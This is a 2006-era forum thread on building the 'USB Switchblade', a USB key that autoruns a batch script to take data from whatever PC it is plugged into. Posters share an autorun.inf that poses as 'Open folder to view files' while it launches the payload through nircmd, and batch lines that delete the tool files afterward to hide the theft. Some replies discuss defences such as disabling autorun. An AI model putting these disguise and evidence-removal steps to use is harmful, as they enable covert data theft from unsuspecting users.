Jump to content

USB Switchblade Development

Darren Kitchen

By Darren Kitchen
in USB Hacks

 Share

Recommended Posts

  • Replies 581
  • Created
  • Last Reply

Top Posters In This Topic

Popular Days

Top Posters In This Topic

Popular Days

Irving Washington Newbie

Irving Washington

Posted
Posted

This is all for non U3 versions - it may be applicable to U3, but as I don't have it, I won't speculate...

I've tried Silivrenion's version of the Switchblade, and have added the following to the batch file:

if not exist "Removable Disk" md "Removable Disk" >nul

Start explorer.exe "Removable Disk

This is a slight improvement in that it:

a) Does something after trying to open the USB drive

b) opens into a folder other than the one containing all the dodgy stuff ;)

You can obviously change this to do what you like. Bearing in mind that it's a 'SocEng' (wetware) exploit to get someone to run the code, opening a folder that has a load of .exes, or hidden folders/files, batch files, or a combination is going to worry people somewhat.

So the initial fix is to open a new folder that doesn't contain all the naughty stuff.

I'm working on 2 vastly superior versions of this - will post once done

Link to comment
Share on other sites
Irving Washington Newbie

Irving Washington

Posted
Posted

Irving Washington's One Time Version

This is an updated version of Silivrenion's Technique, which uses a modified batch file to remove evidence of the steal and launch Explorer.exe following the data theft.

This means the USB key can only be used once before needing 'priming' again, but has the benefits of appearing as though nothing has happened (other than a slightly slow Explorer launch).

Mods to Siliv's version are as follows:

Add the following to switchblade.bat before :End 

 cd .... DEL /f /q nircmd.exe > nul 

DEL /f /q autorun.inf > nul 

RMDIR /s /q WIP > nul 

Start explorer.exe . 

DEL /f /q switchblade.bat >nul

If you want, you can use the ATTRIB command to hide the logfile(s), but be warned that people like myself who enable the 'show hidden files' view will still see these files and be intrigued...

Link to comment
Share on other sites
marc Newbie

marc

Posted
Posted

Damn this works well.

I edited the autorun.inf file (on the amish/non-u3 version) to make it more realistic:

[autorun]

action=Open folder to view files

icon=iconsfolder.ico

shellexecute=nircmd.exe execmd CALL batexeprogstart.bat

Link to comment
Share on other sites
marc Newbie

marc

Posted
Posted

Sorry for double post, but I just have something involving morals to say.

I believe that learning this can help ourselves for antivirus protection. Our knowledge on the tricks used by viruses can only expand, such as that social trick on Amish's version, or the U3 CD partition. No longer will I feel safe that by inserting a USB drive into my PC, nothing will execute unless I double click on what I want.

AV's should realise that we do want to learn about this stuff. It is very useful to know.

Besides, how can an AV block a social trick in autorun.inf? There are somethings we NEED to know about.

Link to comment
Share on other sites
Silva Newbie

Silva

Posted
Posted
Sorry for double post, but I just have something involving morals to say.

I believe that learning this can help ourselves for antivirus protection. Our knowledge on the tricks used by viruses can only expand, such as that social trick on Amish's version, or the U3 CD partition. No longer will I feel safe that by inserting a USB drive into my PC, nothing will execute unless I double click on what I want.

AV's should realise that we do want to learn about this stuff. It is very useful to know.

Besides, how can an AV block a social trick in autorun.inf? There are somethings we NEED to know about.

You could just disable autorun like most of the people I know(they disable it because they hate the annoying pop up when they put in cd's :wink: ) and you'll be completly safe from this attack, and norton AV 2003 does ask if you want to run the program from the remvoable media object(something along those lines) if you use the non u3 way.

Link to comment
Share on other sites
marc Newbie

marc

Posted
Posted

Absolutely Silva, but I am talking about the general knowledge you can get from this. Who would expect a flash disk to have a CD partition?

I know some people just use common sense instead of any real AV, but very little can be trusted.

Link to comment
Share on other sites
Darren Kitchen Grand Master

Darren Kitchen

Posted
  • Author
Posted
Sorry for double post, but I just have something involving morals to say.

I believe that learning this can help ourselves for antivirus protection. Our knowledge on the tricks used by viruses can only expand, such as that social trick on Amish's version, or the U3 CD partition. No longer will I feel safe that by inserting a USB drive into my PC, nothing will execute unless I double click on what I want.

AV's should realise that we do want to learn about this stuff. It is very useful to know.

Besides, how can an AV block a social trick in autorun.inf? There are somethings we NEED to know about.

Since USB Keys went mainstream I've always been weary of the autorun threat, so much so that I've made it habit to hold the shift key while inserting any untrusted media.

Link to comment
Share on other sites
Darren Kitchen Grand Master

Darren Kitchen

Posted
  • Author
Posted

Sorry for the double post but two quick things:

1. Staples is having a sale on the U3 enabled Sandisk Cruzer Micro drives. I picked up a 512 MB in store for $14.99. The 1 GB is about $25 and the 2 GB is about $45. The sale works both online and in-store and is good until September 23rd (this Saturday). Now that I've got two I can have a leathal and non-leathal USB drive on my keychain.

2. I just got off the phone with the Sr. Editor of a well known computer magazine in the US. They will be printing a story about the USB Switchblade on their website some time tomorrow (I'll provide a link when it's live), and possibly on next week's print edition of the magazine. Way to go everyone who's contributed, this project is totally rocking! I feel like we're actually bringing awareness to both regular users and IT pros about these attack vectors. Hopefully the editor will say something nice about us.

Link to comment
Share on other sites
johnsrobotics Newbie

johnsrobotics

Posted
Posted

I can't seem to find those prices...I found the 2GB for $90

http://www.circuitcity.com/ssm/SanDisk-Cru...roductDetail.do

I do see a 1GB for $45...unless someone can point me to a 2GB for $45, I'll just go with 2 512MB drives for $40

I need to get one for general use anyways, as I don't even pwn one yet.

Link to comment
Share on other sites
moonlit Newbie

moonlit

Posted
Posted
It seems that this doesn't work on Windows 2003 (or at least doesn't with the tests I've tried with autorun.inf on USB devices) but yeah, it's always a good idea to be careful with untrusted media...

Amish or MaxDamage technique?

Neither, though it would've been Amish's technique... I tried with a DIY autorun.inf with Notepad as the app to run and an app I think was called Ceedo which uses autorun to open a menu when you insert the device...

I did have the idea of using an MP3 player or a digital camera to store the stuff on for Amish's method because that'd look even less conspicuous, who's gonna suspect a digicam? I didn't get a chance to test that though since as I say it failed on Win2k3 and I don't have an XP box right now (thinking I should use a VM for testing stuff like this)

Link to comment
Share on other sites
Darren Kitchen Grand Master

Darren Kitchen

Posted
  • Author
Posted
I can't seem to find those prices...I found the 2GB for $90

I do see a 1GB for $45...unless someone can point me to a 2GB for $45, I'll just go with 2 512MB drives for $40

I need to get one for general use anyways, as I don't even pwn one yet.

$15 512MB

$25 1GB

$45 2GB

Those links are from the Staples store in my area (Williamsburg, VA). AFAIK it's nation wide. I picked up a 512 MB for $15 today in Vienna, VA in store at that sale price.

Sale ends on the 23rd. We're not affiliated with Sandisk or Staples, but it's a damn good deal.

Both the U3 method and Amish method work great. I think Amish made clever use of some social engineering, but personally I'm a bit more fond of the U3 technique since it doesn't require any key presses/mouse clicks. (No offence Amish)

Link to comment
Share on other sites
Darren Kitchen Grand Master

Darren Kitchen

Posted
  • Author
Posted
Another use for this could be a useful security device for you. If you can set the autorun to clean history, close encrypted shares etc., it's a lot easier than remembering / installing routines /applications to do this - basically it could mean that you can wipe traces from any machine you use...

Remember in episode 1x02 or 1x03 the windows firewall automation script? My goal was to make changes to several windows firewalls without the use of group policies, so I'd have to physically go to each machine. While the script wasn't malicious in nature it used the same technique as Amish's hack to run my firewall script. The same could be done with U3. I could see it being used for white hat purposes such as installing updates, latest anti-virus definitions, testing for security best practices. But then again by the time that the automation part makes it actually start to break even in time spent administrating each machine you're probably already in a domain environment with enough flexability with the clients that this could all be automated from the server anyway. Ahh, thinking out loud again.

Link to comment
Share on other sites
flick650 Newbie

flick650

Posted
Posted

Sorry for the second post but has anybody else seen the story that is floating around digg.com at the moment.

http://passivemode.net/updates/2006/6/5/wi...on-exploit.html

It allows you to get admin using just the AT command.

I am working on integrating it into my USB key, i will let you know the results. Unfortunatley it does mean the key has to be in there for about a minute and a half but it might help.

Link to comment
Share on other sites
Sloth Newbie

Sloth

Posted
Posted
Sorry for the second post but has anybody else seen the story that is floating around digg.com at the moment.

http://passivemode.net/updates/2006/6/5/wi...on-exploit.html

It allows you to get admin using just the AT command.

I am working on integrating it into my USB key, i will let you know the results. Unfortunatley it does mean the key has to be in there for about a minute and a half but it might help.

correct me if im wrong but i dont think this works the way you think it does.

ok the only way i got this to work was by trying from admin account to escalate to system, this did not work to escalate from limited user to system. maybe i did something wrong but i think it was a proof of concept to get higher privlages than admin, not an actual escalation from limited to higher privlage.

-Sloth

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
 Share
Go to topic listing

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...